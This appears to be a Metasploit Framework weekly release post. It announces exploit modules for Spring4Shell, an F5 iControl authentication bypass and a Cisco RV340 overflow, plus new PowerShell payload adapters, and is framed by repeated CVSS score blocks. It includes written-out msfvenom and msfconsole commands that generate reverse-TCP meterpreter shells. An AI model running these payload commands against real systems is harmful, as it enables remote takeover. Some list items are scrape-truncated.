9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
Community contributor vleminator added a new module which exploits CVE-2022-22965—more commonly known as "Spring4Shell." Depending on its deployment configuration, Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.
In addition, we have a new module that targets F5 iControl and exploits CVE-2022-1388, from contributor heyder. This vulnerability allows attackers to bypass iControl’s REST authentication on affected versions and achieve unauthenticated remote code execution as root
via the /mgmt/tm/util/bash
endpoint.
The last of the new RCE modules this week—community contributor pedrib added a Cisco RV340 SSL VPN module, which exploits CVE-2022-20699. This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.
Metasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new cmd/windows/powershell*
payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.
Since these are new payload modules, they can also be generated directly using MSFVenom:
./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128
This is similar to using one of the psh-
formatters with the existing -f
option. However, because it’s a payload module, the additional Powershell specific options are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting Powershell::encode_final_payload=true
.
root
user on affected systems.root
user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.war
file, though it may be possible to bypass these limitations later.#16529 from dwelch-r7 - This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:
use osx/x64/meterpreter_reverse_tcp
generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging=‘rpath:/tmp/foo.txt’
to_handler
#16538 from adfoster-r7 - The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.
#16551 from adfoster-r7 - The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.
#16553 from mauvehed - This updates Metasploit’s .github/SECURITY.md
file with the latest steps to follow when raising security issues with Rapid7’s open source projects.
exploit/windows/local/s4u_persistence
module to allow it to run on later Windows versions.-w 32
or -w 64
- previously these flag values were unintentionally ignored.windows/gather/ad_to_sqlite
to no longer crash. The module will now additionally store the extracted information as loot.nessus_connect
login functionality to correctly handle the @
symbol being present in the password.As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C